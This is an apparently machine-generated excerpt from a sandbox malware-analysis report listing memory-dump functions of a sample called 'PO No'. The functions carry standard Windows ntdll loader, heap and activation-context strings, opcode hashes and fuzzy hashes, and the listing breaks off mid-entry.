                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                          • Instruction ID: 4311ae125caa61290cfb46ea28f2e1cf6d5fed055097439f4508369f73c1a9b3
                                                          • Opcode Fuzzy Hash: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                          • Instruction Fuzzy Hash: C1A1AE3190022ADBDB25CF68DC85BA9B7B5BF58354F1845EAD908AF251D730AEC1CF90
                                                          Function 01574AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015B3437
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015B3456
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015B342A
                                                          • RtlDeactivateActivationContext, xrefs: 015B3425, 015B3432, 015B3451
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          • Opcode ID: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                          • Instruction ID: 2522e5502fb16e87560258b0a9c02d18e5a6c30b852369138f31896b5a76f4a2
                                                          • Opcode Fuzzy Hash: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                          • Instruction Fuzzy Hash: 976101366107129FDB22CF1DD886B7AB7E5BF80B50F148569E959AF280D734E801CB91
                                                          Function 015464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015A106B
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015A10AE
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015A1028
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015A0FE5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                          • Instruction ID: 20c53bf2572d9b1dcc324f570d2828c4bc26ba18c069c5cde4a004cafcd16ae0
                                                          • Opcode Fuzzy Hash: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                          • Instruction Fuzzy Hash: B871E2B19043469FCB21EF54C884B9B7FA8BF96768F800469F9488F186D334D589CBD2
                                                          Function 0156245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015AA992
                                                          • LdrpDynamicShimModule, xrefs: 015AA998
                                                          • apphelp.dll, xrefs: 01562462
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015AA9A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                          • Instruction ID: c8887eb3b3c8598d7afe28ba3ab485ef5b3f73a2acaddcfd3ca6895cfc59d9d1
                                                          • Opcode Fuzzy Hash: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                          • Instruction Fuzzy Hash: F4316472A40202EFEB319F6DDC85AAE7BF8FBC4B00F560419E9016F245C7B09991CB90
                                                          Function 015529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: , xrefs: 01553264
                                                          • HEAP[%wZ]: , xrefs: 01553255
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0155327D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                          • Instruction ID: 878ea3dc279eb22acb3c1d29a19040ecdd15c8b858999b1ec4fcb7bc45c859a9
                                                          • Opcode Fuzzy Hash: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                          • Instruction Fuzzy Hash: 1192AA71A04249DFDBA5CFA8C4547AEBBF1BF48310F18849AE85AAF252D734A941CF50
                                                          Function 015D02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                          • API String ID: 0-1670051934
                                                          • Opcode ID: bfa48d003f32bb47366b48e989c2b0f207617909e626f8cbffd9eda024243cca
                                                          • Instruction ID: fd0525b281edb0895824d6f56ff44711e80240f67ca05db9801eea046092322f
                                                          • Opcode Fuzzy Hash: bfa48d003f32bb47366b48e989c2b0f207617909e626f8cbffd9eda024243cca
                                                          • Instruction Fuzzy Hash: C4227D72A047028FE734CF2DC89562ABBE1BBD4310F25892EF29A8B690D771E544CB41
                                                          Function 01550770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                          • Instruction ID: 045c3c96122bb314af9e15e1f4d72a3fcd6aea491ec74cad9fbcc7537f0c54fe
                                                          • Opcode Fuzzy Hash: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                          • Instruction Fuzzy Hash: BCF17830A00606DFEB55CF68C8A4F6EBBF5FF84304F14856AE9569F285D734A981CB90
                                                          Function 01541460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01541728
                                                          • HEAP: , xrefs: 01541596
                                                          • HEAP[%wZ]: , xrefs: 01541712
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: b4dafe64888898f93664bd3430b37adb2ed1db18a0ebf70ce5db4def75b9f617
                                                          • Instruction ID: 67fe266c3bdf2cb1914f8d8d3e5e973065cd6eb044d5579626c9543f1bf7e240
                                                          • Opcode Fuzzy Hash: b4dafe64888898f93664bd3430b37adb2ed1db18a0ebf70ce5db4def75b9f617
                                                          • Instruction Fuzzy Hash: FEE1B330A04A469BDB19CF68C4917BEBBF5BF85318F18885EE596CF246D734E980CB50
                                                          Function 01566962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          • Opcode ID: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                          • Instruction ID: 7b9e3002842a59b800c9e85969759fd15e6585a9d8f41fb4d600062c67db07ca
                                                          • Opcode Fuzzy Hash: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                          • Instruction Fuzzy Hash: 8CC25F716083419FE725CF28C841BAFBBE9BFC8754F04892DE9998B251D734D845CB92
                                                          Function 0153A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                          • Instruction ID: f43663b393d2e164a212510b5b1a7d9416fe0f428d7c20f804279a76c990453d
                                                          • Opcode Fuzzy Hash: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                          • Instruction Fuzzy Hash: C8A13C7191162A9BDF21DF68CC88BADB7B8FF44710F1041E9E909AB250E7359E84CF51
                                                          Function 01560BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpCheckModule, xrefs: 015AA117
                                                          • Failed to allocated memory for shimmed module list, xrefs: 015AA10F
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015AA121
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                          • Instruction ID: 40aedf194cb1d57f2c0650630fbaf5941697e30320738ea57635ee6b980d39f1
                                                          • Opcode Fuzzy Hash: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                          • Instruction Fuzzy Hash: 2B71B171A40206DFEB25DF68CD85ABEB7F4FB84304F14446DE802AF295D734AA51CB90
                                                          Function 01550A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                          • Instruction ID: bf37109077aa64c9b7abd07960851fdac0568dcb89bae45707aa73d2276a5228
                                                          • Opcode Fuzzy Hash: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                          • Instruction Fuzzy Hash: 2161B071610306DFDB69CF28C890B6EBBE1FF84714F14855AE8558F292E7B0E881CB91
                                                          Function 015EDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 015EDC32
                                                          • HEAP: , xrefs: 015EDC1F
                                                          • HEAP[%wZ]: , xrefs: 015EDC12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                          • API String ID: 0-3815128232
                                                          • Opcode ID: 2565a6656d56a831f2e7c7f2374aacdfa10ed719ac152e51007bc0fdc39edb71
                                                          • Instruction ID: 1e85d9a5f091e7f03b402006186f51eb65f3d408b9a02fc842233de9753b9f27
                                                          • Opcode Fuzzy Hash: 2565a6656d56a831f2e7c7f2374aacdfa10ed719ac152e51007bc0fdc39edb71
                                                          • Instruction Fuzzy Hash: E15105359001148AEB6DCA6DC84C77677FAFB85284F044C49E4D28F285E276D842DF21
                                                          Function 0157C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 015B82DE
                                                          • Failed to reallocate the system dirs string !, xrefs: 015B82D7
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015B82E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                          • Instruction ID: 26142108df7a7475144ea11b7240c3f4316ac06df722717dfe8d4c906e8f99a8
                                                          • Opcode Fuzzy Hash: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                          • Instruction Fuzzy Hash: 3B41E171514312ABD721EB68ED81B5FB7E8BF85750F00592EF949DB290EB70D8108B92
                                                          Function 015FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • PreferredUILanguages, xrefs: 015FC212
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015FC1C5
                                                          • @, xrefs: 015FC1F1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                          • Instruction ID: de939b9937e6baa7f8ab359294f6f2f85221de5207e794cb147635a90f3f9fce
                                                          • Opcode Fuzzy Hash: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                          • Instruction Fuzzy Hash: E6416176E1020EABDB11DAD8C851FEEBBB8FB54700F14407AEB49BB240D7749A44CB50
                                                          Function 015D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
                                                          • Instruction ID: 977cc9ed87e880430b609546555458adc1fcf701165d64389a20950de14d9f28
                                                          • Opcode Fuzzy Hash: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
                                                          • Instruction Fuzzy Hash: 8541BF32A0065A8BEB26DBE9C844BADBBF9FF95340F14045AD901EFB91D7348901CB51
                                                          Function 015C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 015C4899
                                                          • LdrpCheckRedirection, xrefs: 015C488F
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015C4888
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
                                                          • Instruction ID: 87ceb03166be66a947fae14f884e54c64e25f96691760dcdc769cbfa58d18d9f
                                                          • Opcode Fuzzy Hash: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
                                                          • Instruction Fuzzy Hash: 27419E32A046519FDB22CEACD860E2B7BE4FF89E50B05056DED499F216D730D811CB91
                                                          Function 01550BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
                                                          • Instruction ID: 9196e2a842b325e031c5704fab27f793cf62baa4d690a95e51158de4b7414155
                                                          • Opcode Fuzzy Hash: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
                                                          • Instruction Fuzzy Hash: A811E4323641029FD759CA28C891F7EB7A5FF80725F19851AF806CF291E734D841C751
                                                          Function 015C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 015C20F3
                                                          • LdrpInitializationFailure, xrefs: 015C20FA
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015C2104
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
                                                          • Instruction ID: 806c04577605a60bc3c20c74e9af2f36dee29fc2f2b7c0857243551742bbef93
                                                          • Opcode Fuzzy Hash: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
                                                          • Instruction Fuzzy Hash: 1AF0C239A40319AFE724EA8DCC56FAA3B68FB81F54F50006DFA007F6C5D2F0A950C691
                                                          Function 015503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
                                                          • Instruction ID: 4ed8e61426d32137649801c0ebac6c514b31138acfdf55840c855508d4cb715d
                                                          • Opcode Fuzzy Hash: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
                                                          • Instruction Fuzzy Hash: C7715C71A0014ADFDB41DFE8C990BAEBBF8BF48744F144065E905EB291EA74ED01CBA1
                                                          Function 015552A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@
                                                          • API String ID: 0-149943524
                                                          • Opcode ID: effd140173c63ca30333b674b3e76ad897847cdee71850fd9b1c5a3998b0691b
                                                          • Instruction ID: f56d87018554a553bd0fa696f6cc4702258ff59f9c5087c9a2d8926fcc5ed106
                                                          • Opcode Fuzzy Hash: effd140173c63ca30333b674b3e76ad897847cdee71850fd9b1c5a3998b0691b
                                                          • Instruction Fuzzy Hash: 34327A745283528BD7648F18C4A073EBBE1FF84744F58492EFA959F2A0E734D944CBA2
                                                          Function 0154A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Exit, xrefs: 0154AA25
                                                          • LdrResSearchResource Enter, xrefs: 0154AA13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
                                                          • Instruction ID: 62884172550538e566f6f072f07225b894c4c4355e98f31cce4258796c168ab8
                                                          • Opcode Fuzzy Hash: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
                                                          • Instruction Fuzzy Hash: 60E19471E802199FEB62CF99C980BAEBBB9FF44358F14442AE912EF251D774D940CB50
                                                          Function 01542FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @4Cw@4Cw$PATH
                                                          • API String ID: 0-1794901795
                                                          • Opcode ID: 25262c7664984f795cd97acc1339b0b169bd78f8ab7a49a8d8cdc520e5885ce1
                                                          • Instruction ID: 30ac45dc10cb0c235c8159fdb86dbedd6cde75d124c1673d420886b52d9f0571
                                                          • Opcode Fuzzy Hash: 25262c7664984f795cd97acc1339b0b169bd78f8ab7a49a8d8cdc520e5885ce1
                                                          • Instruction Fuzzy Hash: A6F1AC71E00229ABDB65DF9DDC80AAEBBF1FF88704F544029E901AF364D7309951CBA1
                                                          Function 0160A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: ab032dab2c50b7035bf98dbc86eb96c173b81c0424f224f5fd8c87afaf149914
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 0AC1AF312143429BE72ACE68CC41B6BBBE5BFC4394F088A2DF6968B2D1D775D505CB41
                                                          Function 01540CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Failed to retrieve service checksum., xrefs: 0159EE56
                                                          • ResIdCount less than 2., xrefs: 0159EEC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                          • API String ID: 0-863616075
                                                          • Opcode ID: 07ea64c000c1c6695e0baaaef2c322479ca82c498037b4ffc0aa717c6eaac805
                                                          • Instruction ID: 8845e41f8bef0bd2728e118f65a2d81f95609832e28e3f64fadd6daa855c593f
                                                          • Opcode Fuzzy Hash: 07ea64c000c1c6695e0baaaef2c322479ca82c498037b4ffc0aa717c6eaac805
                                                          • Instruction Fuzzy Hash: BCE1E1B19087859FE364CF15C480BABBBE4FBC8714F50892EE5998B380D7719909CF96
                                                          Function 015BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
                                                          • Instruction ID: 05c597ec9de2910d9f1e3560f8f37793e90feb77a108e408244b50991c7aa297
                                                          • Opcode Fuzzy Hash: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
                                                          • Instruction Fuzzy Hash: F5613B71E006199FDB15DFA88881BEEBBF5FB48700F18846DE659EF291D731A901CB50
                                                          Function 015E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
